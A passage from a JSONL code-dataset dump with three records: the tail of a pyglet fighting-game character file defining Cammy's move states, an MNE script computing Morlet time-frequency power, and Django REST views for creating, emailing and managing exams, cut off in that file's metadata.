if self.moveLeft:\n self.left = True\n \n #Crouch Block (Hit)\n if self.action == 14.5:\n self.targetFrame = self.frames29\n self.frame = 3\n self.blockWait += 1\n self.state = \"CrouchBlockHit\"\n if self.blockWait >= 20:\n self.action = 14\n self.blockWait = 0\n \n #Cannon Drill(Start)\n if self.action == 17:\n self.targetFrame = self.frames24\n if self.frame >= len(self.frames24) - 1:\n self.vel[0] = -5\n self.frame = 0\n self.jumpHeight = 4\n self._height() \n choice = random.choice([\"Audio/Champs/Cammy/cannon_drill_A.wav\", \"Audio/Champs/Cammy/cannon_drill_B.wav\"])\n self.PlayVoice(choice)\n self.action = 17.3\n self.superSkill = False\n \n #Cannon Drill(Mid)\n if self.action == 17.3:\n self.force = [6.3,4.7]\n self.freezeInAir = True\n self.targetFrame = self.frames25A\n if self.targetFrame[int(self.frame)] == 82 and self.voiceFrame != 82:\n self.Play(\"Audio/wiff.wav\")\n self.voiceFrame = 82\n self.invincible = False\n if self.frame >= len(self.frames25) - 1:\n if self.kickLoop > 0:\n self.voiceFrame = 0\n self.kickLoop -= 1\n self.frame = 0\n else:\n self.kickLoop = 6\n self.force = [0,0]\n self.action = 17.5\n\n #End Cannon Drill if opponent is blocking\n blockStates = [13.5, 14.5]\n if self.opponent.action in blockStates:\n self.freezeInAir = False\n self.frame = 0\n self.action = 17.8\n self.targetFrame = self.frames25C\n self.kickLoop = 6\n self.vel[0] = 8\n self.vel[1] = 9\n \n #Cannon Drill(End)\n if self.action == 17.5:\n self.freezeInAir = False\n self.targetFrame = self.frames25B\n if self.frame >= len(self.frames25B) - 1:\n self.frame = 0\n self.action = -1\n\n\n #Cannon Drill Cancel\n if self.action == 17.8:\n self.freezeInAir = False\n self.targetFrame = self.frames25C\n if self.frame >= len(self.frames25C) - 1:\n self.frame = 0\n self.action = -1\n \n \n \n #Command Grab - Main (Start)\n if self.action == 19:\n self.targetFrame = self.frames42\n if self.voiceFrame != self.frame and self.frame >= len(self.frames42) - 2:\n self.voiceFrame = self.frame\n self.Play(\"Audio/wiff.wav\")\n self.force = [5,0]\n if self.frame >= len(self.frames42) - 1:\n self.frame = 0\n self.action = -100\n hits = [6, 6.3, 6.5]\n if self.opponent.hitCD < 1:\n #If the opponent is airborne\n if self.opponent.pos[1] > self.ground:\n self.opponent.pos[1] = self.ground\n self.opponent.state = \"Grounded\"\n self.opponent.action = random.choice(hits)\n self.opponent.frame = 0\n self.opponent.fall = False\n self.opponent.jump == False\n self.opponent.vel[1] = 0\n\n #If it hits\n if self.opponent.action in hits:\n self.action = self.grabChain\n self.targetGrabbed = self.opponent\n self.grabChain = 19.2\n self.targetGrabbed.frameSpeed = .05\n self.targetGrabbed.toGrab = True\n \n #Command Grab - A (Start)\n if self.action == 19.1:\n self.targetFrame = self.frames43\n if self.frame >= len(self.frames43) - 1:\n if self.voiceFrame != -1:\n self.voiceFrame = -1\n self.Play(\"Audio/jump.wav\")\n self.jumpHeight = 3\n self.gravity = .3\n self.vel[0] = -4\n self._height()\n self.frame = len(self.frames43) - 1\n hits = [6, 6.3, 6.5, 13.5, 14.5]\n \n #Command Grab A (Caught)\n if self.action == 19.2:\n self.isGrabbing = True\n self.targetFrame = self.frames44\n catchFrames = [23, 23, 23.3, 23.3, 23.3, 23.8, 23.8]\n self.opponent.action = catchFrames[int(self.frame)]\n self.force = [6 * self.direction,3]\n self.vel[0] = 2 * self.direction\n choice = random.choice([\"Audio/Champs/Cammy/Grunt/50e.wav\", \"Audio/Champs/Cammy/Grunt/49e.wav\", \"Audio/Champs/Cammy/Grunt/48e.wav\"])\n if self.targetFrame[int(self.frame)] == 120 and self.voiceFrame != self.targetFrame[int(self.frame)]:\n self.voiceFrame = self.targetFrame[int(self.frame)]\n self.PlayVoice(choice)\n if self.frame >= len(self.frames44) - 1:\n self.targetGrabbed.frameSpeed = self.oldSpeed\n self.targetGrabbed.isGrabbed = False\n self.targetGrabbed.bounce = 1\n self.targetGrabbed.toGrab = False\n self.targetGrabbed.Get_Hit(attacker=self, damage=self.damage, force=self.force, typeHit=\"Ground\")\n self.targetGrabbed = None\n self.isGrabbing = False\n self.frame = len(self.frames44) - 1\n self.action = 7.5\n self.jump = True\n self.gravity = .8\n self.force = [0,0]\n\n #Shun' Po (Start)\n if self.action == 30:\n self.targetFrame = self.frames45\n self.force = [3, 16]\n self.invincible = True\n if self.targetFrame[int(self.frame)] == 64 and self.voiceFrame != 64:\n self.voiceFrame = 64\n self.Play(\"Audio/wiff.wav\")\n choice = random.choice([\"Audio/Champs/Cammy/Grunt/42e.wav\", \"Audio/Champs/Cammy/Grunt/43e.wav\"])\n self.PlayVoice(choice)\n if self.frame >= len(self.frames45) - 1:\n self.frame = 0\n self.action = 0\n self.voiceFrame = 0\n self.invincible = False\n self.state = \"Grounded\"\n if self.opponent.fall:\n self.state = \"Skill\"\n self.action = 30.1\n self.jumpHeight = 9\n self._height()\n self.Play(\"Audio/jump.wav\")\n \n ##Shun' Po -> Air Attack (Leap) -> Punch\n if self.action == 30.1:\n self.targetFrame = self.frames45B\n self.velocity = 2 * self.direction * -1\n if self.frame >= len(self.frames45B) - 1:\n self.frame = 0\n self.action = 30.2\n self.vel[1] = self.jumpHeight\n if self.hitKick == \"MK\":\n self.action = 30.4\n self.vel[1] += 3\n \n ##Shun' Po -> Air Attack (First) -> Punch\n if self.action == 30.2:\n self.force = [3, 6]\n self.targetFrame = self.frames45C\n if self.targetFrame[int(self.frame)] == 69 and self.voiceFrame != 69:\n self.voiceFrame = 69\n self.Play(\"Audio/wiff.wav\")\n choice = random.choice([\"Audio/Champs/Cammy/Grunt/42e.wav\", \"Audio/Champs/Cammy/Grunt/43e.wav\"])\n if self.frame >= len(self.frames45C) - 1:\n self.frame = 0\n self.voiceFrame = 0\n self.action = 30.3\n self.vel[1] = 6\n time.sleep(.05)\n \n ##Shun' Po -> Air Attack (Second) -> Punch\n if self.action == 30.3:\n self.force = [8, 4]\n self.targetFrame = self.frames45D\n if self.targetFrame[int(self.frame)] == 72 and self.voiceFrame != 72:\n self.voiceFrame = 72\n self.Play(\"Audio/wiff.wav\")\n self.jumpHeight = 5\n self.vel[1] = self.jumpHeight\n choice = random.choice([\"Audio/Champs/Cammy/Grunt/42e.wav\", \"Audio/Champs/Cammy/Grunt/43e.wav\"])\n if self.frame >= len(self.frames45D) - 1:\n self.frame = len(self.frames45D) - 1\n self.voiceFrame = 0\n\n\n ##Shun' Po -> Air Attack (First) -> Kick\n if self.action == 30.4:\n self.inAfterImage = True\n self.force = [3, 3]\n self.damage = 30\n self.targetFrame = self.frames46\n if self.vel[1] <= 0:\n self.jumpHeight = 0\n self.vel[1] = self.jumpHeight\n if self.targetFrame[int(self.frame)] == 76 and self.voiceFrame != 76:\n self.voiceFrame = 76\n self.Play(\"Audio/wiff.wav\")\n if self.frame >= len(self.frames46) - 1:\n self.frame = 0\n self.voiceFrame = 0\n self.action = 30.5\n time.sleep(.05)\n \n ##Shun' Po -> Air Attack (Second) -> Kick\n if self.action == 30.5:\n self.force = [8, 7]\n self.targetFrame = self.frames46B\n if self.targetFrame[int(self.frame)] == 74 and self.voiceFrame != 74:\n self.voiceFrame = 74\n self.Play(\"Audio/wiff.wav\")\n self.jumpHeight = 0\n self.vel[1] = self.jumpHeight\n choice = random.choice([\"Audio/Champs/Cammy/Grunt/45e.wav\", \"Audio/Champs/Cammy/Grunt/46e.wav\", \"Audio/Champs/Cammy/Grunt/48e.wav\",\n \"Audio/Champs/Cammy/Grunt/54_2e.wav\"])\n self.PlayVoice(choice)\n if self.frame >= len(self.frames46B) - 1:\n self.frame = len(self.frames46B) - 1\n self.voiceFrame = 0\n self.inAfterImage = False\n \n \n #Super Cannon Drill (Start)\n if self.action == 31:\n self.targetFrame = self.frames24\n if self.frame >= len(self.frames24) - 1:\n self.frame = 0\n self.action = 31.5\n \n \n \n \n #Throwing(Catching)\n if self.action == 21:\n self.isGrabbing = True\n self.targetFrame = self.frames37\n if self.frame >= len(self.frames37) - 1:\n self.isGrabbing = False\n self.frame = 0\n self.action = 0\n \n #Throwing(Caught)\n if self.action == 22:\n self.backSpring = True\n self.isGrabbing = True\n self.targetFrame = self.frames38\n self.targetGrabbed.action = self.catchFrames[int(self.frame)]\n self.force = [6,1]\n if self.frame >= len(self.frames38) - 1:\n self.targetGrabbed.isGrabbed = False\n self.targetGrabbed.Get_Hit(attacker=self, damage=self.damage, force=self.force, typeHit=\"FireBall\")\n self.targetGrabbed = None\n self.isGrabbing = False\n self.action = 7.5\n self.fallHeight = 3\n self.fall = True\n self.force = [0,0]\n self.frame = len(self.frames38) - 1\n \n\n #Dummy\n if self.action == -100:\n self.action = 0\n self.state = \"Grounded\"\n self.isGrabbing = False\n self.isControlled = True\n \n #Getting Caught A (Ground)\n if self.action == 23:\n self.targetFrame = self.frames39\n self.isGrabbed = True\n self.frame = 0\n \n #Getting Caught B (Ground)\n if self.action == 23.3:\n self.targetFrame = self.frames39\n self.isGrabbed = True\n self.frame = 1\n \n #Getting Caught C (Mid)\n if self.action == 23.6:\n self.targetFrame = self.frames39\n self.isGrabbed = True\n self.frame = 2\n \n #Getting Caught D (High)\n if self.action == 23.8:\n self.targetFrame = self.frames39\n self.isGrabbed = True\n self.frame = 3\n\n\n\n ############ End Game ############\n #Win - To - Sub Animation Win\n if self.action == 20:\n self.targetFrame = self.frames30\n if self.frame >= len(self.frames30) - 1:\n choice = [20.2, 20.5]\n self.action = random.choice(choice)\n self.frame = 0\n if self.voiceCD <= 0:\n if self.winCount == 1:\n self.Play(self.wins[0][1][0])\n if self.winCount >= 2:\n choice = random.choice([0,1])\n self.Play(self.wins[1][1][choice])\n \n #Sub Animation Win (Shuffule Arms)\n if self.action == 20.2:\n self.targetFrame = self.frames31\n if self.frame >= len(self.frames31) - 1:\n self.frame = len(self.frames31) - 1\n \n #Sub Animation Win 2B (Turn Around)\n if self.action == 20.5:\n self.targetFrame = self.frames33\n if self.frame >= len(self.frames33) - 1:\n self.frame = len(self.frames33) - 1\n \n \n #Idle - Taunt (Loop)\n if self.action == -4:\n self.targetFrame = self.frames36B\n if self.frame >= len(self.frames36B) - 1:\n self.action = -5\n self.frame = 0\n \n #Taunt\n if self.action == -5:\n self.targetFrame = self.frames36\n if self.frame >= len(self.frames36) - 1:\n self.action = 0\n self.frame = 0\n \n \n #Idle - Response Taunt (Loop)\n if self.action == -4.5:\n self.targetFrame = self.frames35B\n if self.frame >= len(self.frames35B) - 1:\n self.action = -6\n self.frame = 0\n\n \n #Respond Taunt\n if self.action == -6:\n self.targetFrame = self.frames35\n if self.frame >= len(self.frames35) - 1:\n self.frame = 0\n self.targetFrame = self.frames1\n self.action = 0\n \n self.Update_Grab()\n self.Update_Graphics()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n\n\n\n", "repo_name": "Rex-445/cxc", "sub_path": "Project/Cammy.py", "file_name": "Cammy.py", "file_ext": "py", "file_size_in_byte": 43066, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pyglet.image.load", "line_number": 7, "usage_type": "call"}, {"api_name": "pyglet.image", "line_number": 7, "usage_type": "attribute"}, {"api_name": "champion.Champion", "line_number": 10, "usage_type": "name"}, {"api_name": "pyglet.sprite.Sprite", "line_number": 33, "usage_type": "call"}, {"api_name": "pyglet.sprite", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pyglet.media.load", "line_number": 92, "usage_type": "call"}, {"api_name": "pyglet.media", "line_number": 92, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 278, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 291, "usage_type": "call"}, {"api_name": "pyglet.media.load", "line_number": 315, "usage_type": "call"}, {"api_name": "pyglet.media", "line_number": 315, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 552, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 638, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 708, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 744, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 770, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 804, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 810, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 821, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 843, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 854, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 940, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 946, "usage_type": "call"}]} +{"seq_id": "38625813498", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 22 16:55:00 2016\n\n@author: mje\n\"\"\"\n\nimport mne\nimport numpy as np\nfrom my_settings import (epochs_folder, tf_folder)\nfrom mne.time_frequency import tfr_array_morlet\nimport sys\n\nsubject = sys.argv[1]\n\nfreqs = np.arange(8, 13, 1) # define frequencies of interest\nn_cycles = 4. # freqs / 2. # different number of cycle per frequency\n\nsides = [\"left\", \"right\"]\nconditions = [\"ctl\", \"ent\"]\n\nepochs = mne.read_epochs(\n epochs_folder + \"%s_trial_start-epo.fif\" % subject, preload=True)\nepochs.resample(250)\n\nfor cond in conditions:\n for side in sides:\n power = tfr_array_morlet(\n epochs[cond + \"/\" + side],\n sfreq=epochs.info[\"sfreq\"],\n frequencies=freqs,\n n_cycles=n_cycles,\n use_fft=True,\n output=\"complex\",\n n_jobs=1)\n np.save(tf_folder + \"%s_%s_%s-4-complex-tfr.npy\" %\n (subject, cond, side), power)\n", "repo_name": "MadsJensen/CAA", "sub_path": "tfr_complex_all.py", "file_name": "tfr_complex_all.py", "file_ext": "py", "file_size_in_byte": 959, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 14, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 16, "usage_type": "call"}, {"api_name": "mne.read_epochs", "line_number": 22, "usage_type": "call"}, {"api_name": "my_settings.epochs_folder", "line_number": 23, "usage_type": "name"}, {"api_name": "mne.time_frequency.tfr_array_morlet", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 36, "usage_type": "call"}, {"api_name": "my_settings.tf_folder", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "73995048169", "text": "from django_filters.rest_framework import DjangoFilterBackend\nfrom django.http import Http404\nfrom django.core.mail import EmailMultiAlternatives, EmailMessage, send_mail\n\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.views import APIView\nfrom rest_framework.generics import ListAPIView\nfrom rest_framework import filters, pagination\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom itertools import chain\n\n# for generating pdf invoice\nimport os\nfrom io import BytesIO\nfrom django.http import HttpResponse\nfrom django.template.loader import get_template\nfrom xhtml2pdf import pisa\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.staticfiles import finders\nfrom django.template.loader import render_to_string\nfrom qrcode import *\n\nfrom examiner.renderers import ExamRenderer\nfrom examiner.models import Exam\nfrom examiner.serializers import ExamSerializer, ExamCreateSerializer, ExamListSerializer\nfrom examiner.custom_permissions import IsExaminerPermission, IsOwnExaminerPermission\nfrom author.models import Question\nfrom admin_site.settings import FRONT_END_DOMAIN_LINK, MEDIA_ROOT\n\n\nEXAM_LINK = FRONT_END_DOMAIN_LINK + 'attend_exam/check_start_exam/'\n\n# craete pdf and qr code and mail to exmainer\ndef send_pdf_mail(exam, user):\n \n data = {\n 'exam_id' : exam['id'],\n 'exam_title' : exam['title'],\n 'exam_description' : exam['description'],\n 'exam_is_time_limit' : exam['is_time_limit'],\n 'exam_time_limit_hour' : exam['time_limit_hour'],\n 'exam_time_limit_minute' : exam['time_limit_minute'],\n 'exam_start_time' : exam['start_time'],\n 'exam_end_time' : exam['end_time'],\n 'exam_exam_link' : exam['exam_link'],\n 'exam_created_by_name' : user.name,\n 'exam_created_by_email' : user.email,\n 'MEDIA_ROOT' : MEDIA_ROOT\n }\n\n fdata = exam['exam_link']\n qrcode = make(fdata)\n qrcode.save(\"media/qrcode/exam/\"+str(exam['id'])+\".png\")\n \n template = get_template('exam/mailExamDetailPdf.html')\n html = template.render(data)\n result = BytesIO()\n pdf = pisa.pisaDocument(BytesIO(html.encode(\"ISO-8859-1\")), result)#, link_callback=fetch_resources)\n pdf = result.getvalue()\n filename = 'ExamDetail.pdf'\n\n subject = 'Exam Created'\n message = render_to_string('exam/mailExamDetailText.html', data)\n recipient = user.email\n email = EmailMessage(subject, \n message,\n os.environ.get('EMAIL_USER'),\n [recipient]\n )\n \n # email.attach_alternative(message, \"text/html\")\n email.attach(filename, pdf, 'application/pdf')\n email.send(fail_silently=True)\n\n\nclass MyPageNumberPagination(pagination.PageNumberPagination):\n page_size = 3\n max_page_size = 5\n page_size_query_param = 'records'\n # page_query_param = 'p'\n # last_page_strings = 'end'\n\n\n# create new Exam with Selected Questions\nclass CreateExamWithSelectedQuestionsAPIView(APIView):\n # renderer_classes = [ExamRenderer]\n permission_classes = [IsAuthenticated, IsExaminerPermission]\n message = \"You are not Authenticated to access to permission\"\n \n def perform_create(self, serializer):\n serializer.save(created_by=self.request.user)\n\n def post(self, request, format=None):\n serializer = ExamCreateSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n serializer.save()\n\n exam = serializer.data\n\n send_pdf_mail(exam, request.user)\n\n return Response({'msg': 'Exam Created Successfully. Please Check your Mail.','data': serializer.data}, status=status.HTTP_201_CREATED)\n \n\n# create new Exam with Random Questions \nclass CreateExamWithRandomQuestionsAPIView(APIView):\n # renderer_classes = [ExamRenderer]\n permission_classes = [IsAuthenticated, IsExaminerPermission]\n message = \"You are not Authenticated to access to permission\"\n \n def perform_create(self, serializer):\n serializer.save(created_by=self.request.user)\n\n def post(self, request, format=None):\n total_question = request.data.get('total_question')\n random_question = request.data.get('random_question')\n\n if(random_question > 0):\n randomQues = Question.objects.all().order_by('?')[:random_question]\n ques = randomQues\n else:\n easy_question = request.data.get('easy_question')\n medium_question = request.data.get('medium_question')\n hard_question = request.data.get('hard_question')\n\n easyQues = Question.objects.filter(level='Easy').order_by('?')[:easy_question]\n mediumQues = Question.objects.filter(level='Medium').order_by('?')[:medium_question]\n hardQues = Question.objects.filter(level='Hard').order_by('?')[:hard_question]\n ques = list(chain(easyQues, mediumQues, hardQues))\n\n questions = []\n num = 0\n for que in ques:\n num += 1\n questions.append({'question':que.id, 'number':num})\n\n request.data['total_question'] = total_question\n request.data['questions'] = questions\n serializer = ExamCreateSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n serializer.save()\n\n exam = serializer.data\n send_pdf_mail(exam, request.user)\n\n return Response({'msg': 'Exam Created Successfully. Please Check your Mail.','data': serializer.data}, status=status.HTTP_201_CREATED)\n \n\n# Mail Link of single Exam\nclass MailExamLinkAPIView(APIView):\n renderer_classes = [ExamRenderer]\n permission_classes = [IsAuthenticated, IsExaminerPermission, IsOwnExaminerPermission]\n message = \"You are not Authenticated to access to permission\"\n def get_object(self, pk):\n try:\n return Exam.objects.get(pk=pk)\n except Exam.DoesNotExist:\n raise Http404\n \n def post(self, request, pk, format=None):\n exam = self.get_object(pk)\n self.check_object_permissions(request, exam)\n users = request.data['users']\n \n for user in users:\n subject = f'''Give Exam of {exam.title}'''\n message = f'''Dear {user},\n Give Your Best in Exam \\n \n Exam title : {exam.title}\\n\n Exam description : {exam.description}\\n\n Exam taken By : {exam.created_by.email}\\n\n Exam Link : {exam.exam_link}\\n\n Best of Luck'''\n send_mail(\n subject,\n message,\n # settings.EMAIL_HOST_USER,\n request.user.email,\n [user],\n fail_silently=False,\n )\n return Response({'users':users,'msg':'Mail Sent Successfully'}, status=status.HTTP_200_OK)\n\n\n# list Exam by me\nclass RetriveExamByMeAPIView(ListAPIView):\n # renderer_classes = [QuestionRenderer]\n permission_classes = [IsAuthenticated, IsExaminerPermission, IsOwnExaminerPermission]\n # queryset = Question.everything.all()\n serializer_class = ExamListSerializer\n filter_backends = [DjangoFilterBackend, filters.OrderingFilter, filters.SearchFilter]\n filterset_fields = ['is_active','created_by','is_deleted']\n ordering_fields = ['is_active','created_by','created_at','created_at']\n ordering = ['-created_at'] # default order\n search_fields = ['^title', 'description']\n # pagination_class = MyPageNumberPagination\n\n def get_queryset(self):\n user = self.request.user\n return Exam.own_objects.filter(created_by = user)\n\n\n# get single Exam By Examiner\nclass RetriveExamDetailByExaminerAPIView(APIView):\n # renderer_classes = [ExamRenderer]\n permission_classes = [IsAuthenticated]\n def get_object(self, pk):\n try:\n return Exam.objects.get(pk=pk)\n except Exam.DoesNotExist:\n raise Http404\n \n def get(self,request, pk, format=None):\n Exam = self.get_object(pk)\n serializer = ExamListSerializer(Exam)\n return Response({'data':serializer.data}, status=status.HTTP_200_OK) \n\n\n# get single Exam for register time\nclass RetriveExamDetailForRegisterAPIView(APIView):\n # renderer_classes = [ExamRenderer]\n permission_classes = [AllowAny]\n def get_object(self, pk):\n try:\n return Exam.objects.get(pk=pk)\n except Exam.DoesNotExist:\n raise Http404\n \n def get(self,request, pk, format=None):\n Exam = self.get_object(pk)\n serializer = ExamSerializer(Exam)\n return Response({'data':serializer.data}, status=status.HTTP_200_OK)\n\n\n# update single Exam\nclass UpdateExamAPIView(APIView):\n # renderer_classes = [ExamRenderer]\n permission_classes = [IsAuthenticated, IsExaminerPermission, IsOwnExaminerPermission]\n message = \"You are not Authenticated to access to permission\"\n def get_object(self, pk):\n try:\n return Exam.everything.get(pk=pk)\n except Exam.DoesNotExist:\n raise Http404\n \n def put(self, request, pk, format=None):\n exam = self.get_object(pk)\n self.check_object_permissions(request, exam)\n serializer = ExamSerializer(instance=exam, data=request.data, partial=True)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n return Response({'msg': 'Exam Updated Successfully','data': serializer.data}, status=status.HTTP_200_OK)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n# soft delete single Exam\nclass DeleteExamAPIView(APIView):\n renderer_classes = [ExamRenderer]\n permission_classes = [IsAuthenticated, IsExaminerPermission, IsOwnExaminerPermission]\n message = \"You are not Authenticated to access to permission\"\n def get_object(self, pk):\n try:\n return Exam.everything.get(pk=pk)\n except Exam.DoesNotExist:\n raise Http404\n \n def delete(self, request, pk, format=None):\n Exam = self.get_object(pk)\n self.check_object_permissions(request, Exam)\n Exam.soft_delete()\n Exam.is_updated = True\n Exam.save()\n return Response({'msg': 'Exam Deleted Successfully'}, status=status.HTTP_200_OK)\n\n\n# restore single Exam\nclass RestoreExamAPIView(APIView):\n renderer_classes = [ExamRenderer]\n permission_classes = [IsAuthenticated, IsExaminerPermission, IsOwnExaminerPermission]\n message = \"You are not Authenticated to access to permission\"\n def get_object(self, pk):\n try:\n return Exam.everything.get(pk=pk)\n except Exam.DoesNotExist:\n raise Http404\n \n def put(self, request, pk, format=None):\n exam = self.get_object(pk)\n self.check_object_permissions(request, exam)\n exam.restore()\n exam.is_updated = True\n exam.save()\n return Response({'msg': 'Exam Restored Successfully'}, status=status.HTTP_200_OK)\n\n\n# soft Deactivate single Exam\nclass DeactivateExamAPIView(APIView):\n renderer_classes = [ExamRenderer]\n permission_classes = [IsAuthenticated, IsExaminerPermission, IsOwnExaminerPermission]\n message = \"You are not Authenticated to access to permission\"\n def get_object(self, pk):\n try:\n return Exam.everything.get(pk=pk)\n except Exam.DoesNotExist:\n raise Http404\n \n def put(self, request, pk, format=None):\n Exam = self.get_object(pk)\n self.check_object_permissions(request, Exam)\n Exam.deactivate()\n Exam.is_updated = True\n Exam.save()\n return Response({'msg': 'Exam Deactivated Successfully'}, status=status.HTTP_200_OK)\n\n\n# soft Activate single Exam\nclass ActivateExamAPIView(APIView):\n renderer_classes = [ExamRenderer]\n permission_classes = [IsAuthenticated, IsExaminerPermission, IsOwnExaminerPermission]\n message = \"You are not Authenticated to access to permission\"\n def get_object(self, pk):\n try:\n return Exam.everything.get(pk=pk)\n except Exam.DoesNotExist:\n raise Http404\n \n def put(self, request, pk, format=None):\n Exam = self.get_object(pk)\n self.check_object_permissions(request, Exam)\n Exam.activate()\n Exam.is_updated = True\n Exam.save()\n return Response({'msg': 'Exam Activated Successfully'}, status=status.HTTP_200_OK)\n\n\n", "repo_name": "Umesh-310/project_code_test", "sub_path": "Django_Demo_Project-main/examiner/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 12568, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "admin_site.settings.FRONT_END_DOMAIN_LINK", "line_number": 35, "usage_type": "name"}, {"api_name": "admin_site.settings.MEDIA_ROOT", "line_number": 52, "usage_type": "name"}, {"api_name": "qrcode.save", "line_number": 57, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 59, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 61, "usage_type": "call"}, {"api_name": "xhtml2pdf.pisa.pisaDocument", "line_number": 62, "usage_type": "call"}, {"api_name": "xhtml2pdf.pisa", "line_number": 62, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 62, "usage_type": "call"}, {"api_name": "django.template.loader.render_to_string", "line_number": 67, "usage_type": "call"}, {"api_name": "django.core.mail.EmailMessage", "line_number": 69, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 71, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 71, "usage_type": "attribute"}, {"api_name": "rest_framework.pagination.PageNumberPagination", "line_number": 80, "usage_type": "attribute"}, {"api_name": "rest_framework.pagination", "line_number": 80, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 89, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 91, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsExaminerPermission", "line_number": 91, "usage_type": "name"}, {"api_name": "examiner.serializers.ExamCreateSerializer", "line_number": 98, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 107, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 107, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 107, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 111, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 113, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsExaminerPermission", "line_number": 113, "usage_type": "name"}, {"api_name": "author.models.Question.objects.all", "line_number": 124, "usage_type": "call"}, {"api_name": "author.models.Question.objects", "line_number": 124, "usage_type": "attribute"}, {"api_name": "author.models.Question", "line_number": 124, "usage_type": "name"}, {"api_name": "author.models.Question.objects.filter", "line_number": 131, "usage_type": "call"}, {"api_name": "author.models.Question.objects", "line_number": 131, "usage_type": "attribute"}, {"api_name": "author.models.Question", "line_number": 131, "usage_type": "name"}, {"api_name": "author.models.Question.objects.filter", "line_number": 132, "usage_type": "call"}, {"api_name": "author.models.Question.objects", "line_number": 132, "usage_type": "attribute"}, {"api_name": "author.models.Question", "line_number": 132, "usage_type": "name"}, {"api_name": "author.models.Question.objects.filter", "line_number": 133, "usage_type": "call"}, {"api_name": "author.models.Question.objects", "line_number": 133, "usage_type": "attribute"}, {"api_name": "author.models.Question", "line_number": 133, "usage_type": "name"}, {"api_name": "itertools.chain", "line_number": 134, "usage_type": "call"}, {"api_name": "examiner.serializers.ExamCreateSerializer", "line_number": 144, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 152, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 152, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 152, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 156, "usage_type": "name"}, {"api_name": "examiner.renderers.ExamRenderer", "line_number": 157, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 158, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsExaminerPermission", "line_number": 158, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsOwnExaminerPermission", "line_number": 158, "usage_type": "name"}, {"api_name": "examiner.models.Exam.objects.get", "line_number": 162, "usage_type": "call"}, {"api_name": "examiner.models.Exam.objects", "line_number": 162, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 162, "usage_type": "name"}, {"api_name": "examiner.models.Exam.DoesNotExist", "line_number": 163, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 163, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 164, "usage_type": "name"}, {"api_name": "django.core.mail.send_mail", "line_number": 180, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 188, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 188, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 188, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 192, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 194, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsExaminerPermission", "line_number": 194, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsOwnExaminerPermission", "line_number": 194, "usage_type": "name"}, {"api_name": "examiner.serializers.ExamListSerializer", "line_number": 196, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.DjangoFilterBackend", "line_number": 197, "usage_type": "name"}, {"api_name": 